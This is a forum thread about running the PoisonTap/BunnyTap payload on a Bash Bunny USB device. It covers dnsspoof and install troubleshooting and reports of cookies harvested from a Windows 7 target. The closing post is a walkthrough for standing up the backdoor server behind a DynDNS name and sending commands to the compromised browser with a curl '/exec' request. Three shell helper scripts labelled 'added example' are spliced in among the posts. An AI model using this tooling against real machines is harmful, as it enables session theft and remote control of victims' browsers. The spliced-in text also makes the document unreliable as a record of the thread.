
PoisonTap on the Bunny


jhaddix


Having a lot of fun playing with BB and BunnyTap. I've gotten it to load and run, however I'm seeing a bit of strangeness. 1) The payload.txt runs without throwing an error, but when I ssh into the BB and do a "ps -aux | grep -i screen" I only see /usr/bin/node.js running. When I run the line from the payload.txt file "/usr/bin/screen -dmS dnsspoof /usr/sbin/dnsspoof -i usb0 port 53" and run the grep again, it shows up in the list. At this point I'm looking for the DNS requests to be redirected, but no joy on that, so I unplug and restart from scratch. After BB & BunnyTap start up again I ssh back in and check, and again dnsspoof isn't running. So this time I ran it using "/usr/sbin/dnsspoof -i usb0 port 53" so I could see any output. Testing DNS requests this time resulted in the dnsspoof responses below, but again all DNS requests come back with the correct IP (used dig, ping and browser in testing). Wireshark running on the OS X side didn't show any DNS traffic from the BB either (tried it with capture set for the BB interface and again using the interface on the OS X).

Anyone else seen this behavior (if so how'd you fix it)?  

Whistle Master - any ideas/tests that I can try?

Thanks 

 

<dnsspoof output> 

172.16.64.1.36702 > 8.8.8.8.53:  60675+ A? citibank.com

172.16.64.1.52442 > 8.8.8.8.53:  2452+ A? google.com

172.16.64.1.44733 > 8.8.8.8.53:  7511+ A? citibank.com

172.16.64.1.59932 > 8.8.8.8.53:  47184+ A? anyhwere.com

172.16.64.1.44565 > 8.8.8.8.53:  57995+ A? anyhwere.com

172.16.64.1.50786 > 8.8.8.8.53:  32458+ A? anyhwere.com

172.16.64.1.44234 > 8.8.8.8.53:  12251+ A? anyhwere.com

172.16.64.1.58344 > 8.8.8.8.53:  10966+ A? example.cm

172.16.64.1.57680 > 8.8.8.8.53:  35170+ A? example.com

172.16.64.1.58216 > 8.8.8.8.53:  10032+ A? may.com
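Added example, not from the thread and not part of PoisonTap or BunnyTap: a small POSIX shell helper that reads dnsspoof's console output, such as the lines above, and tallies which names the attached host queried. It assumes the tcpdump-style line shape dnsspoof prints above; the embedded sample input is the thread's own ten lines. It gives a quick check of what the host actually sent towards the Bunny's usb0 interface when the spoofed answers do not seem to take effect.

```shell
#!/bin/sh
# Summarise which names a Bunny-attached host queried, from dnsspoof's
# console output. Reads dnsspoof output on stdin and prints
# "<name> <count>", most-queried first. Added example; not thread code.

summarize_dns_queries() {
    awk '
    # Expected shape (dnsspoof prints tcpdump-style lines):
    #   172.16.64.1.36702 > 8.8.8.8.53:  60675+ A? citibank.com
    # $1 src.port  $2 ">"  $3 dst.port:  $4 query id  $5 qtype  $6 name
    $2 == ">" && $4 ~ /^[0-9]+\+?$/ && $5 ~ /\?$/ {
        name = $6
        sub(/\.$/, "", name)          # drop a trailing dot on absolute names
        count[name]++
    }
    END { for (n in count) printf "%s %d\n", n, count[n] }
    ' | LC_ALL=C sort -k2,2nr -k1,1
}

# Total number of query lines recognised; lines of any other shape
# (dnsspoof banners, warnings) are ignored rather than miscounted.
query_count() {
    summarize_dns_queries | awk '{ total += $2 } END { print total + 0 }'
}

# Constructed sample: the ten lines quoted in the post above.
SAMPLE_DNSSPOOF_OUTPUT='172.16.64.1.36702 > 8.8.8.8.53:  60675+ A? citibank.com
172.16.64.1.52442 > 8.8.8.8.53:  2452+ A? google.com
172.16.64.1.44733 > 8.8.8.8.53:  7511+ A? citibank.com
172.16.64.1.59932 > 8.8.8.8.53:  47184+ A? anyhwere.com
172.16.64.1.44565 > 8.8.8.8.53:  57995+ A? anyhwere.com
172.16.64.1.50786 > 8.8.8.8.53:  32458+ A? anyhwere.com
172.16.64.1.44234 > 8.8.8.8.53:  12251+ A? anyhwere.com
172.16.64.1.58344 > 8.8.8.8.53:  10966+ A? example.cm
172.16.64.1.57680 > 8.8.8.8.53:  35170+ A? example.com
172.16.64.1.58216 > 8.8.8.8.53:  10032+ A? may.com'

# Usage: pipe a saved dnsspoof log in, or run with --demo for the sample.
if [ "$#" -gt 0 ] && [ "$1" = "--demo" ]; then
    printf '%s\n' "$SAMPLE_DNSSPOOF_OUTPUT" | summarize_dns_queries
fi
```

On the Bunny, `dnsspoof -i usb0 port 53 | tee /tmp/dns.log` keeps a copy you can feed to `summarize_dns_queries` afterwards.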

   


Update: I plugged BB w/BT into a Windows 7 laptop and it ran like a champ, dumping cookies into poisontap.cookies.log. But for reasons I haven't sorted out yet, it appears BunnyTap is getting no love from the iMac (runs but nothing on screen and no cookies in the log file). Going to try it on a MBP just as soon as the wife isn't looking (evil grin)... just kidding, she's used to my "testing" stuff on her system. Deal is "I break it, I bought it" lol

If anyone has already successfully run BunnyTap on an iMac (or a MBP for that matter), I'd appreciate it if you gave a quick reply to let me know.

Thanks

 

 


On 3/18/2017 at 1:35 PM, graythang said:

Update: I plugged BB w/BT into a Windows 7 laptop and it ran like a champ, dumping cookies into poisontap.cookies.log. But for reasons I haven't sorted out yet, it appears BunnyTap is getting no love from the iMac (runs but nothing on screen and no cookies in the log file). Going to try it on a MBP just as soon as the wife isn't looking (evil grin)... just kidding, she's used to my "testing" stuff on her system. Deal is "I break it, I bought it" lol

If anyone has already successfully run BunnyTap on an iMac (or a MBP for that matter), I'd appreciate it if you gave a quick reply to let me know.

Thanks

 

 

Did you change the ATTACKMODE in the payload.txt?


On 3/14/2017 at 7:33 PM, Onus said:

q

 

I've got the backend server up and running and curl commands work (I can send cmds to the client via the backdoor across the Internet). Working on a hiccup; once I have it resolved I'll post a walkthrough on how I set it up if anyone is still interested in it for their own lab. The hiccup I'm working on is on the client side... BunnyTap runs and collects cookies, but the ws isn't opened and it appears the backdoor isn't getting installed (i.e. cached) during the run. I can manually open the backdoor file I copied over to the client in the browser, and it triggers the web service connection; at this point I can send curl commands etc. So the file works, but only if I kick it off manually. Client is Win7 and I get the same results in both IE 11 and Chrome. Odd.

 

 


On 3/29/2017 at 10:34 PM, graythang said:

I've got the backend server up and running and curl commands work (I can send cmds to the client via the backdoor across the Internet). Working on a hiccup; once I have it resolved I'll post a walkthrough on how I set it up if anyone is still interested in it for their own lab. The hiccup I'm working on is on the client side... BunnyTap runs and collects cookies, but the ws isn't opened and it appears the backdoor isn't getting installed (i.e. cached) during the run. I can manually open the backdoor file I copied over to the client in the browser, and it triggers the web service connection; at this point I can send curl commands etc. So the file works, but only if I kick it off manually. Client is Win7 and I get the same results in both IE 11 and Chrome. Odd.

 

 

Yes a walkthrough would be clutch 


So I have the PoisonTap files, but when trying to get it to work I get the blinking red light, then it goes to white and sits there forever...
Has anyone successfully installed PoisonTap on the Bash Bunny?


@Mr.Pupp3T

To install it manually:

1. Share internet (http://wiki.bashbunny.com/#!./index.md#Sharing_an_Internet_Connection_with_the_Bash_Bunny_from_Windows)

2. Connect over TCP (172.16.64.1) to the BashBunny

3. Run

ping 8.8.8.8

to be sure the Internet is working (pings Google's DNS)

4. Run

apt-get -y install dsniff

to install "dsniff"

5. Delete (or rename) "install.sh" in the switch# folder where PoisonTap is, so the Bunny doesn't try to run it
(red blinking when it failed / no Internet; you already installed the dependencies in step 4!)
(Maybe easier when you replug BashBunny in arming-mode (Serial and storage))

6. Try it again

 

@Dave-ee Jones

On the BashBunny you log in as "root", so you already run everything as admin.
About as funny as "Did you try turning it off and back on again?" :P
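The manual steps 3 to 5 above as one script, added here as an example; it is not BunnyTap's own install.sh and not Gachnang's code. Assumptions: it runs on the Bunny itself as root after the Internet share of step 1 is in place, and the payload switch folder is passed as an argument (the /root/udisk/payloads/switch1 path in the usage text is an assumed default, adjust it to the switch you use).

```shell
#!/bin/sh
# Manual dependency install for BunnyTap on the Bash Bunny, following
# steps 3-5 of the post above. Added example; not the payload's install.sh.
# Assumes: running on the Bunny as root, host Internet share already set up.

check_internet() {
    # Step 3: a single ICMP probe to Google's resolver, as the post suggests
    ping -c 1 -W 3 8.8.8.8 >/dev/null 2>&1
}

install_dsniff() {
    # Step 4: dnsspoof is part of the dsniff package; skip if already present
    if command -v dnsspoof >/dev/null 2>&1; then
        return 0
    fi
    apt-get -y install dsniff
}

disable_installer() {
    # Step 5: rename install.sh so the Bunny does not re-run it (and blink red
    # because the dependencies are already installed). Succeeds when the
    # file is absent, so running this twice is harmless.
    dir=$1
    if [ -f "$dir/install.sh" ]; then
        mv "$dir/install.sh" "$dir/install.sh.disabled"
    fi
    [ ! -e "$dir/install.sh" ]
}

main() {
    # Assumed default location of a switch folder on the Bunny's udisk
    dir=${1:?usage: $0 /root/udisk/payloads/switch1}
    check_internet || {
        echo "no Internet from the Bunny: share the host connection first (step 1)" >&2
        return 1
    }
    install_dsniff || {
        echo "apt-get could not fetch dsniff: check the shared connection and retry" >&2
        return 1
    }
    disable_installer "$dir" && echo "dependencies ready; install.sh disabled in $dir"
}

# Only run when a switch folder is given, so the functions can also be sourced.
if [ "$#" -gt 0 ]; then
    main "$@"
fi
```

Copy it onto the Bunny over the same SSH/serial session used for steps 2 to 4 and run it with the switch folder as the only argument; afterwards replug in arming mode and try the payload again (step 6).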


6 hours ago, Mr.Pupp3T said:

When trying to install with ./install I'm getting permission denied. I've tried everything to get it to work; any ideas?

 

1 hour ago, Dave-ee Jones said:

Including run as admin? :P

Just figured out what the problem could be. Did you try to install it on your local machine instead of on the BashBunny?

Install it on the BashBunny, not on your computer. BashBunny needs it, not you ;)


3 hours ago, Gachnang said:

@Mr.Pupp3T

To install it manually:

1. Share internet (http://wiki.bashbunny.com/#!./index.md#Sharing_an_Internet_Connection_with_the_Bash_Bunny_from_Windows)

2. Connect over TCP (172.16.64.1) to the BashBunny

3. Run


ping 8.8.8.8

to be sure the Internet is working (pings Google's DNS)

4. Run


apt-get -y install dsniff

to install "dsniff"

5. Delete (or rename) "install.sh" in the switch# folder where PoisonTap is, so the Bunny doesn't try to run it
(red blinking when it failed / no Internet; you already installed the dependencies in step 4!)
(Maybe easier when you replug BashBunny in arming-mode (Serial and storage))

6. Try it again

 

@Dave-ee Jones

On the BashBunny you log in as "root", so you already run everything as admin.
About as funny as "Did you try turning it off and back on again?" :P

 
 

OK, so I have done what you said above. I'm running the dsniff command, and it says it failed to fetch the required files.


So I have been playing with this. Worked right off the bat. Noticed that on my Windows 10 test machine it fires up the browser automatically; I wonder if it pretends to be a hotel network with a captive portal, and with MS and all their auto stuff it fires off a browser to it so you can OK the agreement?

Anyway. I have been wondering how you can modify the poison URL list? Have not been able to find it yet. Must be missing something. Wondered if it can be changed for more targeted attacks.

Have issues getting the poisoned pages to respond back to my backend server that is on another machine, but have a funny feeling it might be because of a domain violation with an external site trying to talk to an internal site. Might have to try using a hosted server to host it and see what happens.


6 hours ago, PoSHMagiC0de said:

I have been wondering how you can modify the poison url list?  Have not been able to find it yet.

At the bottom of "target_injected_xhtmljs.html" is a function called "getDoms" which returns the list of URLs.
You can freely edit it there.


Bunnytap from repo not working with 1.1. No results popping up and LED turns off completely afterwards but stays red.

 

UPDATE: Seems to be completely incompatible with new firmware. Tried repo and modified versions of bunnytap and it seems to be broken. Other updated payloads are working fine.


I was running into a similar issue, and it appears that the new firmware fails on previously valid LED combinations. For instance, any reference to LED R G B now seems to fail on firmware 1.1, since the proper syntax is now LED W. I was able to get this to work by replacing all combination LED commands in install.sh and payload.txt with the new composite LED commands.

This seems like an oversight and will probably break all previously created scripts that used combo-LED commands. I would expect a future update that will accept both multi and composite codes, so previous payloads using multi-codes won't continue to fail just because of the syntax change.
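An added example, not from the thread or from BunnyTap, of the rewrite maehko describes: a shell filter that turns firmware 1.0-style combination lines such as LED R G B into the single composite colour the 1.1 syntax expects. The R G B to W mapping is the one stated in the post; the other combinations (R G to Y, R B to M, G B to C) follow the Bash Bunny LED colour letters and are an assumption here. Any further tokens on an LED line are passed through unchanged, and single-colour lines are left alone.

```shell
#!/bin/sh
# Convert Bash Bunny 1.0-style multi-colour LED lines ("LED R G B") into the
# composite colour of the 1.1 syntax ("LED W"). Reads a payload on stdin and
# writes the converted payload on stdout. Added example; not BunnyTap code.
# Assumption: the additive map R+G=Y, R+B=M, G+B=C, R+G+B=W; only the
# R G B -> W case is stated in the post above.

convert_led_combos() {
    awk '
    {
        # Only lines whose first word is LED are candidates
        if ($1 != "LED") { print; next }
        r = 0; g = 0; b = 0; ncolours = 0; rest = ""
        for (i = 2; i <= NF; i++) {
            if ($i == "R")      { r = 1; ncolours++ }
            else if ($i == "G") { g = 1; ncolours++ }
            else if ($i == "B") { b = 1; ncolours++ }
            else rest = rest " " $i      # keep blink/pattern arguments as they are
        }
        if (ncolours < 2) { print; next } # single colours are already valid
        if (r && g && b)  c = "W"
        else if (r && g)  c = "Y"
        else if (r && b)  c = "M"
        else              c = "C"
        print "LED " c rest
    }'
}

# Report how many lines would be rewritten, for a dry run before editing.
legacy_led_count() {
    awk '
    $1 == "LED" {
        n = 0
        for (i = 2; i <= NF; i++) if ($i ~ /^[RGB]$/) n++
        if (n >= 2) hits++
    }
    END { print hits + 0 }'
}

# Usage: convert_led_combos < payload.txt > payload.new
if [ "$#" -gt 0 ]; then
    convert_led_combos < "$1"
fi
```

Run it over a copy first (`legacy_led_count < payload.txt` shows how many lines are affected), diff the result against the original, and apply the same pass to install.sh, which the post notes carries the same combo-LED lines.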


On 4/9/2017 at 1:36 AM, maehko said:

I was running into a similar issue, and it appears that the new firmware fails on previously valid LED combinations. For instance, any reference to LED R G B now seems to fail on firmware 1.1, since the proper syntax is now LED W. I was able to get this to work by replacing all combination LED commands in install.sh and payload.txt with the new composite LED commands.

This seems like an oversight and will probably break all previously created scripts that used combo-LED commands. I would expect a future update that will accept both multi and composite codes, so previous payloads using multi-codes won't continue to fail just because of the syntax change.

Can't get it to run anymore. The lights come on but the attack does not work. Nothing pops up stating I am getting cookies. Think this is the only payload that is bricked for me besides quickcreds. I edited like you said you did and nothing pops up anymore.


On 3/30/2017 at 11:27 PM, wrxratd said:

Yes a walkthrough would be clutch 

Things have gotten really hectic and I haven't had the chance to do this up right. But since someone asked about it, here is a brief rundown on how I set up node.js.

You will need to set up a URL that you can use. I was lazy and set up a DynDNS name to point back to myself, then used VMs in bridged mode and let them run (it was simpler for me to open the inbound port I used on my FW whenever I was testing and close it afterwards).

Next, I installed node.js on Kali. I followed these instructions (https://relutiondev.wordpress.com/2016/01/09/installing-nodejs-and-npm-kaliubuntu/);

when finished with the install, run "npm install websocket" (the setup wouldn't work until I did this bit).

Next, load up PoisonTap on Kali using "git clone https://github.com/samyk/poisontap.git".

If you're using the default port (1337), no other changes are needed. But you'll need to read Samy's instructions and update a few files if you're changing the port.

Now, edit the BunnyTap "backdoor.html" replacing all occurrences of "YOUR.DOMAIN" with your DYNDNS URL.

On Kali, cd into the poisontap directory and run "node backend_server.js". The response you should see will have "Server is listening on port 1337" listed in it.

Now take the BB and run your attack.

*****notes******

Even though both are on my network the traffic from target to node.js server was:    

[target Win7 vm]   -> Internet -> DynDNS -> [my FW] -> [Kali Vm]   

 

As I noted in my previous post, I found that the attack worked, but the back door wasn't available until I manually ran "backdoor.html" on the target. Once I did, I could use a curl command on Kali to have the node.js server pop an alert on the Win7 target.

e.g.: curl 'http://myDYNDNS.URL:1337/exec?alert("test")'

Haven't had time to work out why the back door isn't automatically loading on the target when the attack is run yet.

Sorry about the rush job, and I hope this helps someone a little.
